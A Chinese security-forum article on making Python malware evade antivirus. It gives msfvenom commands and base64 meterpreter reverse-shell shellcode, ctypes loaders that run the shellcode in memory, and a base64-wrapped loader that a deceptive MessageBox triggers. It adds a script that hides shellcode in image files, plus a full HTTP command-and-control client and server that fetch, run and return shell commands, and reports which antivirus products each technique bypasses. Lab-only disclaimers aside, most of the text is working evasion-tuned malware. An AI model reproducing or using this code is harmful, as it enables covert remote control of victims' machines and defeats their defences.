人生苦短 我用python
0x01 python优缺性
python的应用领域很广,基本整个互联网都在使用它,这也得益于它丰富的第三方库,以及学习简单,成本低。
作为安全工作者更是离不开它,可以快速的写脚本工具,并且很多安全渗透工具都是以python开发的,比如我们熟知的sqlmap,OneForAll,dirsearch等等。
在免杀方面,近年来python作为后起之秀,也被杀毒软件盯得死死的,很离谱的是python写个helloworld,用pyinstaller打包,也会有杀毒软件报毒.....抛弃这个不谈,python使用pyinstaller打包的文件也很大,随便打包一个文件都有6-7m,但纵使它有这些缺点,我依旧喜欢它。
0x02 python免杀环境
首先声明我这里使用的环境:
python3.8 (32位,主程序)
pyinstaller (打包器)
PyCharm (开发环境)
kali自带msf (shellcode生成)
kali自带nc (接收cmd)
0x03 免杀实践
一、对shellcode或代码加解密
1.简单的加密
首先打开kali的msf,生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.1.131 lport=6666 -f c
将生成的shellcode复制下来,使用python处理成一段字符串:
test='''
"\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x64\x4a"
"\x6b\x69\x31\x49\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x4d\x66"
"\x2b\x4c\x63\x69\x67\x50\x74\x30\x6f\x6d\x4d\x63\x43\x73\x50"
"\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a"
"\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48"
"\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x31"
"\x67\x67\x55\x49\x74\x49\x47\x41\x48\x54\x68\x63\x6c\x30\x50"
"\x45\x6d\x4c\x4e\x49\x73\x42\x31\x6a\x48\x2f\x4d\x63\x43\x73"
"\x77\x63\x38\x4e\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33"
"\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64"
"\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42"
"\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a"
"\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44"
"\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33"
"\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f"
"\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f"
"\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x77\x4b\x68"
"\x51\x68\x47\x67\x43\x41\x42\x6f\x4b\x69\x65\x5a\x51\x55\x46"
"\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f"
"\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68"
"\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a"
"\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32"
"\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e"
"\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71"
"\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f"
"\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59"
"\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61"
"\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f"
"\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51"
"\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77"
"\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56"
"\x6d\x6f\x41\x55\x2f\x2f\x56";
'''
print(test.replace('\n','').replace('"','').replace(';','').replace(' ',''))
将生成的字符串保存。
如:
/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
首先使用最基本的shellcode加载代码进行执行:
代码一:
import ctypes
import base64
s = '''
/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
'''
shellcode = base64.b64decode(s)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
代码二:
import ctypes
import base64
shellcode='''/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
'''
data=base64.b64decode(shellcode)
bdata = bytearray(data)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
两者均可以上线msf。
那么此时上述两个shellcode加载器均无法达到免杀,那么根据正常的思路就是fuzz测试了,对代码进行增删,看杀毒软件主要查杀哪部分,但是使用的方式多了,效果也就变差了,我们换一种思路。
对整个代码进行base64编码,效果怎么样?
import base64
import win32api, win32con
def test():
test = '''
aW1wb3J0IGN0eXBlcwppbXBvcnQgYmFzZTY0CnMgPSAnJycKL09pUEFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVU1mK0xjaWdQdDBvbU1jQ3NQR0Y4QWl3Z3djOE5BY2RKZGU5U1Y0dFNFSXRDUEFIUWkwQjRoY0IwVEFIUWkxZ2dVSXRJR0FIVGhjbDBQRW1MTklzQjFqSC9NY0Nzd2M4TkFjYzQ0SFgwQTMzNE8zMGtkZUJZaTFna0FkTm1pd3hMaTFnY0FkT0xCSXNCMElsRUpDUmJXMkZaV2xILzRGaGZXb3NTNllELy8vOWRhRE15QUFCb2QzTXlYMVJvVEhjbUI0bm8vOUM0a0FFQUFDbkVWRkJvS1lCckFQL1ZhZ3Bvd0toUWhHZ0NBQm9LaWVaUVVGQlFRRkJBVUdqcUQ5L2cvOVdYYWhCV1YyaVpwWFJoLzlXRndIUUsvMDRJZGV6b1p3QUFBR29BYWdSV1YyZ0MyY2hmLzlXRCtBQitOb3MyYWtCb0FCQUFBRlpxQUdoWXBGUGwvOVdUVTJvQVZsTlhhQUxaeUYvLzFZUDRBSDBvV0dnQVFBQUFhZ0JRYUFzdkR6RC8xVmRvZFc1TllmL1ZYbDcvRENRUGhYRC8vLy9wbS8vLy93SERLY1oxd2NPNzhMV2lWbW9BVS8vVgonJycKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzKQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEp
'''
tel = win32api.MessageBox(0, "这是一个病毒,你要运行吗?", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2
print(tel)
if tel == 7:
exec(base64.b64decode(test))
elif tel == 2:
dir('再见')
else:
dir('再见')
test()
上面增加了一个判断。如果选择否,则执行恶意代码,选择"取消"或者"是"则不执行代码。
免杀效果方面在(2022-7-19)
测试可过,火绒,管家,以及eset(试用版)。
360在上线5min后被查杀。
这里测试了一下微步,3/21,判断为木马,还是不太行啊,可能base64加密太简单了,那根据我上篇文章
https://forum.butian.net/share/1580
在这篇文章里介绍了一种加密,当时只是提供了一种思路,代码之类的没有给出,那么这次就用这个加密加强版试试
代码:
# -*- coding: utf-8 -*-
import Tulipdecode
import win32api, win32con
tel = win32api.MessageBox(0, "好兄弟", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2
if tel == 7:
dir()
elif tel == 2:
app = Tulipdecode.Eternal()
abc = app.api_jie(
sc='????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????',
sjc=10947, xzys='单身的素面朝天更难吸引桃花运的注意。恋爱中的需要正视感情的问题,并积极解决。', cpuzy=42342)
exec(abc)
else:
dir('再见')
那么物理机测试的话,360全家桶,火绒,管家,eset都可以过,微步测试安全,但是检测2/22,
有两个大兄弟只要是pyinstaller编译的就报毒。
github地址:
https://github.com/suansuancwk/Tulip
分离加载
接着就谈谈分离免杀吧,顾名思义分离免杀就把shellcode与加载器分离,为了跟好的隐藏shellcode,我们可以将shellcode注入到图片中进行隐藏,这里写个脚本将shellcode注入到图片中,需要准备一张正常的图片,和一段shellcode。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg
这里生成了一张包含shellcode的图片,但是什么都没有,很容易怀疑,那么我们再找张图片,将两张图片进行结合,使shellcode的图片显示为正常的图片。
这里参考小玉玉大佬的代码,
python实现的分离免杀: python实现的分离免杀 (gitee.com)
这里代码路稍微改一下,并不是只有jpg可以使用,其他格式也可以。
代码如下:
import os
def injectimage(file):
if os.path.getsize("output/payload.jpg") == 0:
print("原始shellcodeh获取失败,请检查源代码!")
return 0
shellf = open("output/payload.jpg",'rb')
shellcode = shellf.read()
os.system("mv "+file+" output/"+file)
psize = os.path.getsize("output/"+file)
f = open("output/"+file,'ab+')
f.seek(psize)
f.write(shellcode)
newsize = os.path.getsize("output/"+file)
if newsize>psize or newsize==psize:
print("图片注入成功!")
return psize
def genexe(file,lo):
pyfile = "import os\n\
import ctypes\n\
import base64\n\
f = open('"+file+"', 'rb')\n\
size = os.path.getsize('"+file+"')\n\
f.seek("+str(lo)+")\n\
data = f.read()\n\
f.close()\n\
bdata = bytearray(data)\n\
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int\n\
\n\
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),\n\
ctypes.c_int(0x40))\n\
\n\
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)\n\
eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKGJkYXRhKSkp'))\n\
\n\
handle = ctypes.windll.kernel32.CreateThread(\n\
ctypes.c_int(0),\n\
ctypes.c_int(0),\n\
ctypes.c_int(ptr),\n\
ctypes.c_int(0),\n\
ctypes.c_int(0),\n\
ctypes.pointer(ctypes.c_int(0)))\n\
\n\
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))\n\
"
af = open("payload.py",'w')
af.write(pyfile)
# os.system("pyinstaller -F payload.py")
if __name__ == '__main__':
targetfile = input("请输入图片的路径 :")
if targetfile == '':
print("你没有选择一张图片,将默认使用整个shellcode转换成图片")
os.system("touch demo.png")
targetfile = "demo.png"
location = injectimage(targetfile)
genexe(targetfile,location)
改了一点,这里按照上面生成的效果如下:
运行可以上线,但是吗,免杀可能稍微不太行了,时间太久了,先不管shellcode加载器,单单看看shellcode图片,这是原始直接生成的,
:
这里换成base64加密的shllcode图片,
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg
效果相对较好了,那么相应的就需要修改代码了,增加一句base64解密就行了
import os
import ctypes
import base64
f = open('tx.jpg', 'rb')
size = os.path.getsize('tx.jpg')
f.seek(67558)
data = f.read()
f.close()
data=base64.b64decode(data)
bdata = bytearray(data)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
另外一种加载器的写法如下:
import os
import ctypes
import base64
f = open('tx.jpg', 'rb')
size = os.path.getsize('tx.jpg')
f.seek(67558)
data = f.read()
f.close()
shellcode = base64.b64decode(data)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
以上代码均可以上线。
接下开就是打包了,但是这样免杀成功率未知,可以将上面代码全部加密,加密的方法参考前面。
免杀性就不测试了,由于环境原因,大家可以进行测试,应该不会太差。
远程分离加载就比较简单了,简单就是将包含shellcode或者直接将shellcode放到互联网或者可以获取到的地方,比如图片就可以放到图上,shellcode进行加密放到互联网上等等
将上面的代码或者图片request下来就可以了,原理差不对。
"借刀杀人"
这种方法不建议真实测试,仅供学习参考....
假如我们将直接使用python的system函数执行命令,不使用cs或者msf,达到远控的目的,类似于webshell,这样我们就可以将需要执行的命令放到互联网上,且回显的命令也可以返回到互联网上,可以使用request请求,中间需要心跳时间,多久request一次。简单结构图如下:
上述是使用两台媒介靶机,也可以使用一台,接收与发送都是同一个媒介,但是相对了两台媒介效果好些
这里我不使用真实网站测试,使用本地环境测试。
以下内容均虚拟环境,请勿在真实环境下进行!!!!
一个正常的html页面:
一个php文件,在phpstudy下搭建:
<?php
header("content-type:text/html;charset=utf-8");
if(isset($_COOKIE['id'])&& isset($_COOKIE['time']) && isset($_POST['data']) ){
$id=$_COOKIE['id'];
$time=$_COOKIE['time'];
$data=$_POST['data'];
$myfile = fopen("log.txt", "w") or die("Unable to open file!");
$txt = $data.",".$id.",".$time;
fwrite($myfile, $txt);
fclose($myfile);
}
?>
控制端python代码:
import os
import sys
import time
import lljiam
import lljiem
def getdata():
with open('index1.html', 'r', encoding='utf8') as f:
data = f.read()
f.close()
# print(data)
return data
def fsml(data):
ml = input('执行命令>>>')
app = lljiam.Eternal()
test = app.api_jia('2', ml, zfc='suansuan') # 密文 cpu 时间戳
# print(test)
html = data.format(time=test[2], cpu=test[1], ml=test[0])
with open('index.html', 'w') as f:
f.write(html)
f.close()
if ml == 'exit()':
sys.exit(0)
# fsml(getdata())
def readhx():
with open('log.txt', 'r') as f:
jg = f.read()
f.close()
jg = jg.split(',')
data = jg[0]
cpu = jg[1]
time1 = jg[2]
app = lljiem.Eternal()
ml = app.api_jie(sc=data, sjc=time1, xzys='suansuanadmin', cpuzy=cpu)
print(ml)
os.remove("log.txt")
# readhx()
def ks():
while True:
data = getdata()
fsml(data)
pd()
time.sleep(2)
def pd():
while 1:
if not os.path.exists('log.txt'):
time.sleep(1)
else:
readhx()
break
ks()
被控端代码:
import os
import sys
import time
import lljiem
import requests
import lljiam
def klj_eval(ml):
try:
result = os.popen(ml,'r').read()
except:
result = '出错了'
# print(result)
return result
def getml():
html = requests.get(url='http://192.168.80.1:8000').text
ml = html.split('<!--t')[1].split('t-->')[0]
sjc = html.split('<!--l')[1].split('l-->')[0]
cpu = html.split('<!--f')[1].split('f-->')[0]
# print(ml)
# print(sjc)
# print(cpu)
app = lljiem.Eternal()
ml = app.api_jie(sc=ml, sjc=sjc, xzys='suansuan', cpuzy=cpu)
return ml, sjc
def fshx(hx):
ml = hx
app = lljiam.Eternal()
test = app.api_jia('2', ml, zfc='suansuanadmin') # 密文 cpu 时间戳
headers = {
"cookie": "id=" + str(test[1]) + ';' + 'time=' + str(test[2])
}
data = {
"data": test[0]
}
requests.post(url='http://127.0.0.1:86/cookie.php', data=data, headers=headers)
# fshx(klj_eval(getml()))
def ks():
sjc1 = 0
while True:
time.sleep(2)
mls = getml()
ml = mls[0]
if ml == 'exit()':
sys.exit(0)
else:
if sjc1 != mls[1]:
hx = klj_eval(ml)
fshx(hx)
sjc1 = mls[1]
else:
pass
time.sleep(60)
ks()
另外两个py文件(lljiam,lljiem)是上述加密代码更改版,将爱心替换成了英文字母。
并且上述被控端存在一个心跳时间也就是60s。
上面环境以及代码稍后放到github,仅供参考学习,其他与本人无关:
上述代码比较简单,原理就是,通过一个中间的服务器作为媒介,接收命令,并且获取命令回显结果,这个是在本地搭建,那么假如我在本地搭建一个cms程序,注册用户登录,在个人简介里输入加密后的命令,让客户端get下来,在由客户端解密,并将执行命令的结果加入到图片里,post到图床,控制端再get下来,结果怎么样呢?
这里仅本地演示,更多的利用方式各位师傅自己探索,大致流程图在上述的图片里。
github地址:
suansuancwk/http_bypssAV: http另类的免杀,仅供学习参考!!! (github.com)
0x04 总结
最后的一个项目其实还不太完整,有很多需要优化的地方,当然这里只是提供一种思路,一种学习的思路,不要用该项目做非法测试!!!!
这里的python吗,免杀代码较多,且繁琐,后续将会发布python的一行代码免杀,代码则相对来说较少,采用的则主要是分离免杀,搞文章主要是扩展思路。
感谢给位师傅阅读。
- 本文作者: suansuan
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/1794
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!